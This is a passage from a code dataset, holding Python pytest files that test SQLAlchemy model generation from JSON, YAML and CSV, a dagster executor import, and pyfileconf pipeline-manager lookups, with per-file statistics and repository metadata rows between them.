('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table5', 'int1', None, True, False, None, {'test_attr': 123}, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
("JSON/input_json1.json", 'test_table6', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/input_json2.json", 'test_table7', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/update_from_json1.json", 'test_table8', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json2.json", 'test_table9', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json3.json", 'test_table10', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], ValueError),
])
def test_generate_model_from_json(input_files,
input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
input_data = check_input_file(input_files, input_data)
if not checkers.is_file(input_data):
input_data = json.dumps(input_data)
if error:
with pytest.raises(error):
result = generate_model_from_json(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_json(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table0', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table1', 'int1', None, False, True, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text),
('nested1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table2', 'int1', None, False, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table3', 'int1', [AttributeConfiguration(name = 'bool1', supports_csv = False, supports_json = True, supports_yaml = True, supports_dict = True)],
True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table4', 'int1', None, True, False, {'float': Text}, None, [('int1', Integer),
('string1', Text),
('float1', Text),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table5', 'int1', None, True, False, None, {'test_attr': 123}, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
("JSON/input_json1.json", 'test_table6', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/input_json2.json", 'test_table7', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/update_from_json1.json", 'test_table8', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json2.json", 'test_table9', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json3.json", 'test_table10', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], ValueError),
])
def test_generate_model_from_yaml(input_files,
input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
input_data = check_input_file(input_files, input_data)
if not checkers.is_file(input_data):
input_data = yaml.dump(input_data)
if error:
with pytest.raises(error):
result = generate_model_from_yaml(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_yaml(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
(["int1|string1|float1|bool1|datetime1|date1|time1|nested1",
"123|test|123.45|True|2018-01-01T00:00:00.00000|2018-01-01|2018-01-01T00:00:00.00000|['test','test2']"],
'test_table0', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Text),
('datetime1', DateTime),
('date1', Date),
('time1', DateTime)], None),
("CSV/update_from_csv1.csv", 'test_table1', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('password', Text),
('smallint_column', Integer),
('hybrid_value', Integer)], CSVStructureError),
("CSV/update_from_csv2.csv", 'test_table2', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('password', Text),
('smallint_column', Integer),
('hybrid_value', Integer)], CSVStructureError),
("CSV/update_from_csv3.csv", 'test_table3', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('password', Text),
('smallint_column', Integer),
('hybrid_value', Integer)], None),
])
def test_generate_model_from_csv(input_files,
input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
input_data = check_input_file(input_files, input_data)
if error:
with pytest.raises(error):
result = generate_model_from_csv(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_csv(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
| 56.292758 | 170 | 0.396015 | 2,722 | 36,534 | 5.110948 | 0.054004 | 0.071018 | 0.036228 | 0.019623 | 0.946377 | 0.941633 | 0.936242 | 0.934733 | 0.934733 | 0.934733 | 0 | 0.062432 | 0.49625 | 36,534 | 648 | 171 | 56.37963 | 0.693491 | 0.010538 | 0 | 0.938462 | 1 | 0.001709 | 0.131147 | 0.02856 | 0 | 0 | 0 | 0 | 0.109402 | 1 | 0.008547 | false | 0.006838 | 0.017094 | 0 | 0.025641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
675ff094d64ff262de3fb00140a05c53e9add991 | 206 | py | Python | python_modules/libraries/dagster-celery-docker/dagster_celery_docker_tests/test_inclusion.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 4,606 | 2018-06-21T17:45:20.000Z | 2022-03-31T23:39:42.000Z | python_modules/libraries/dagster-celery-docker/dagster_celery_docker_tests/test_inclusion.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 6,221 | 2018-06-12T04:36:01.000Z | 2022-03-31T21:43:05.000Z | python_modules/libraries/dagster-celery-docker/dagster_celery_docker_tests/test_inclusion.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 619 | 2018-08-22T22:43:09.000Z | 2022-03-31T22:48:06.000Z | from dagster import ExecutorDefinition
from dagster_celery_docker import celery_docker_executor
def test_dagster_celery_docker_include():
assert isinstance(celery_docker_executor, ExecutorDefinition)
| 29.428571 | 65 | 0.878641 | 24 | 206 | 7.125 | 0.5 | 0.280702 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092233 | 206 | 6 | 66 | 34.333333 | 0.914439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
678542ab1f1edb8fd028957265c341dfde1c2b3b | 21,189 | py | Python | tests/test_pipeline_manager/test_get.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 2 | 2020-11-29T19:09:14.000Z | 2021-09-11T19:21:21.000Z | tests/test_pipeline_manager/test_get.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 47 | 2020-02-01T03:54:07.000Z | 2022-01-13T02:24:45.000Z | tests/test_pipeline_manager/test_get.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | null | null | null | from copy import deepcopy
from pyfileconf import Selector
from tests.input_files.mypackage.cmodule import ExampleClass
from tests.test_pipeline_manager.base import PipelineManagerTestBase, CLASS_CONFIG_DICT_LIST
class TestPipelineManagerGetOne(PipelineManagerTestBase):
def test_get_function(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.a_function
iv_func = pipeline_manager.get(iv)
iv_result = iv_func()
str_func = pipeline_manager.get('stuff.a_function')
str_result = str_func()
assert iv_func is str_func is iv.item
assert iv_result == str_result == (None, None)
def test_get_function_multiple_pms(self):
self.write_a_function_to_pipeline_dict_file()
self.write_a_function_to_pipeline_dict_file(file_path=self.second_pipeline_dict_path)
pipeline_manager = self.create_pm()
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
)
pipeline_manager2.load()
sel = Selector()
# Get from pipeline manager 1
iv = sel.test_pipeline_manager.stuff.a_function
iv_func = pipeline_manager.get(iv)
iv_result = iv_func()
str_func = pipeline_manager.get('stuff.a_function')
str_result = str_func()
assert iv_result == str_result == (None, None)
# Get from pipeline manager 2
iv = sel.test_pipeline_manager2.stuff.a_function
iv_func = pipeline_manager2.get(iv)
iv_result = iv_func()
str_func = pipeline_manager2.get('stuff.a_function')
str_result = str_func()
assert iv_result == str_result == (None, None)
def test_get_class(self):
self.write_example_class_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.ExampleClass
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('stuff.ExampleClass')
assert iv_obj is str_obj is iv()
assert iv_obj == ExampleClass(None)
def test_get_class_multiple_pms(self):
self.write_example_class_to_pipeline_dict_file()
self.write_example_class_to_pipeline_dict_file(file_path=self.second_pipeline_dict_path)
pipeline_manager = self.create_pm()
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
)
pipeline_manager2.load()
sel = Selector()
# Get from pipeline manager 1
iv = sel.test_pipeline_manager.stuff.ExampleClass
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('stuff.ExampleClass')
assert iv_obj is str_obj is iv()
assert iv_obj == ExampleClass(None)
# Get from pipeline manager 2
iv = sel.test_pipeline_manager2.stuff.ExampleClass
iv_obj = pipeline_manager2.get(iv)
str_obj = pipeline_manager2.get('stuff.ExampleClass')
assert iv_obj is str_obj is iv()
assert iv_obj == ExampleClass(None)
def test_get_class_from_specific_config_dict(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, name='data')
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is iv.item
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_class_from_specific_config_dict_custom_name(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
self.append_to_specific_class_config('name: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, name='My Name')
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is iv.item
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_class_from_specific_config_dict_custom_key_attr_and_key(self):
self.write_example_class_dict_to_file()
ccdl = deepcopy(CLASS_CONFIG_DICT_LIST)
for cd in ccdl:
cd['key_attr'] = 'c'
pipeline_manager = self.create_pm(
specific_class_config_dicts=ccdl
)
pipeline_manager.load()
self.append_to_specific_class_config('c: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, c='My Name', name=None)
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is iv.item
assert iv_obj.c == str_obj.c == expect_ec.c
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_class_from_specific_config_dict_multiple_pms(self):
self.write_example_class_dict_to_file()
self.write_example_class_dict_to_file(pm_index=1)
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST,
)
pipeline_manager2.load()
sel = Selector()
# Get from pipeline manager 1
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, name='data')
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
# Get from pipeline manager 2
iv = sel.test_pipeline_manager2.example_class.stuff.data
expect_ec = ExampleClass(None, name='data')
iv_obj = pipeline_manager2.get(iv)
str_obj = pipeline_manager2.get('example_class.stuff.data')
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_consistent_specific_config_obj(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv.item is iv_obj is str_obj
def test_get_class_from_specific_config_dict_access_property_that_needs_obj_loaded(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
pipeline_manager.update(
a=(1, 2),
section_path_str='example_class.stuff.data'
)
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv.e == iv_obj.e == str_obj.e == 10
class TestPipelineManagerGetSection(PipelineManagerTestBase):
def test_get_main_dict_section(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff
iv_section = pipeline_manager.get(iv)
iv_func = iv_section[0]
iv_result = iv_func()
str_section = pipeline_manager.get('stuff')
str_func = str_section[0]
str_result = str_func()
direct_iv_func = iv.a_function.item
direct_str_func = pipeline_manager.get('stuff.a_function')
assert iv_func is str_func is direct_iv_func is direct_str_func
assert iv_result == str_result == (None, None)
def test_get_main_dict_section_multiple_pms(self):
self.write_a_function_to_pipeline_dict_file()
self.write_a_function_to_pipeline_dict_file(file_path=self.second_pipeline_dict_path)
pipeline_manager = self.create_pm()
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
)
pipeline_manager2.load()
sel = Selector()
# Get pipeline manager 1 section
iv = sel.test_pipeline_manager.stuff
iv_section = pipeline_manager.get(iv)
iv_func = iv_section[0]
iv_result = iv_func()
str_section = pipeline_manager.get('stuff')
str_func = str_section[0]
str_result = str_func()
assert iv_result == str_result == (None, None)
# Get pipeline manager 2 section
iv = sel.test_pipeline_manager2.stuff
iv_section = pipeline_manager2.get(iv)
iv_func = iv_section[0]
iv_result = iv_func()
str_section = pipeline_manager2.get('stuff')
str_func = str_section[0]
str_result = str_func()
assert iv_result == str_result == (None, None)
def test_get_main_dict_nested_section(self):
self.write_a_function_to_pipeline_dict_file(nest_section=True)
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.my_section
iv_section = pipeline_manager.get(iv)
iv_func = iv_section['stuff'][0]
iv_result = iv_func()
str_section = pipeline_manager.get('my_section')
str_func = str_section['stuff'][0]
str_result = str_func()
assert iv_result == str_result == (None, None)
def test_get_specific_class_dict_section(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_section_custom_name(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
self.append_to_specific_class_config('name: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, name='My Name')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_section_custom_key_attr_and_key(self):
self.write_example_class_dict_to_file()
ccdl = deepcopy(CLASS_CONFIG_DICT_LIST)
for cd in ccdl:
cd['key_attr'] = 'c'
pipeline_manager = self.create_pm(
specific_class_config_dicts=ccdl
)
pipeline_manager.load()
self.append_to_specific_class_config('c: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, c='My Name', name=None)
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
direct_iv_obj = pipeline_manager.get(iv.data)
direct_str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is direct_iv_obj is direct_str_obj
assert iv_obj.c == str_obj.c == expect_ec.c
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_section_multiple_pms(self):
self.write_example_class_dict_to_file()
self.write_example_class_dict_to_file(pm_index=1)
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST,
)
pipeline_manager2.load()
sel = Selector()
# Get pipeline manager 1 section
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
# Get pipeline manager 2 section
iv = sel.test_pipeline_manager2.example_class.stuff
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager2.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager2.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_nested_section(self):
self.write_example_class_dict_to_file(nest_section=True)
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section['my_section']['stuff'][0]
str_section = pipeline_manager.get('example_class')
str_obj = str_section['my_section']['stuff'][0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_custom_key_attr_section(self):
self.write_example_class_dict_to_file()
class_config_dict_list = deepcopy(CLASS_CONFIG_DICT_LIST)
class_config_dict_list[0].update(
key_attr='a'
)
pipeline_manager = self.create_pm(
specific_class_config_dicts=class_config_dict_list
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(a='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
class TestGetSectionPathFromItem(PipelineManagerTestBase):
def test_get_function_section_path(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.a_function
iv_run = iv() # result of a_function(), should not have _section_path_str
assert not hasattr(iv_run, '_section_path_str')
iv_func = pipeline_manager.get(iv)
str_func = pipeline_manager.get('stuff.a_function')
for obj in [iv, iv_func, str_func]:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.a_function'
def test_get_function_section_path_by_section(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff
iv_func = pipeline_manager.get(iv)
str_func = pipeline_manager.get('stuff')
assert iv._section_path_str == 'test_pipeline_manager.stuff'
for obj_list in [iv_func, str_func]:
for obj in obj_list:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.a_function'
def test_get_class_section_path(self):
self.write_example_class_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.ExampleClass
iv_run = iv() # running general class gets instance of class, so should have _section_path_str
iv_class = pipeline_manager.get(iv)
str_class = pipeline_manager.get('stuff.ExampleClass')
for obj in [iv, iv_run, iv_class, str_class]:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.ExampleClass'
def test_get_class_section_path_by_section(self):
self.write_example_class_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff
iv_class = pipeline_manager.get(iv)
str_class = pipeline_manager.get('stuff')
assert iv._section_path_str == 'test_pipeline_manager.stuff'
for obj_list in [iv_class, str_class]:
for obj in obj_list:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.ExampleClass'
def test_get_specific_class_section_path(self):
self.write_example_class_dict_to_file()
ccdl = deepcopy(CLASS_CONFIG_DICT_LIST)
for config_dict in ccdl:
config_dict['execute_attr'] = 'return_section_path_str'
pipeline_manager = self.create_pm(
specific_class_config_dicts=ccdl
)
pipeline_manager.load()
sel = Selector()
assert sel.test_pipeline_manager.example_class.stuff.data.return_section_path_str() == \
'test_pipeline_manager.example_class.stuff.data'
iv = sel.test_pipeline_manager.example_class.stuff.data
# result of __call__ on ExampleClass, should not have _section_path_str on result, but should have in object
iv_run = iv()
pm_run = pipeline_manager.run(iv)
assert not hasattr(iv_run, '_section_path_str')
assert iv_run == pm_run == 'test_pipeline_manager.example_class.stuff.data'
# attribute access should be normal, not have _section_path_str
iv_attr = iv.a
assert not hasattr(iv_attr, '_section_path_str')
assert iv_attr is None
# property access should be normal, not have _section_path_str
iv_property = iv.my_property
assert not hasattr(iv_property, '_section_path_str')
assert iv_property == 100
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
for obj in [iv, iv_obj, str_obj]:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.example_class.stuff.data'
def test_get_specific_class_section_path_by_section(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff')
assert iv._section_path_str == 'test_pipeline_manager.example_class.stuff'
for obj_list in [iv_obj, str_obj]:
for obj in obj_list:
sp = obj._section_path_str
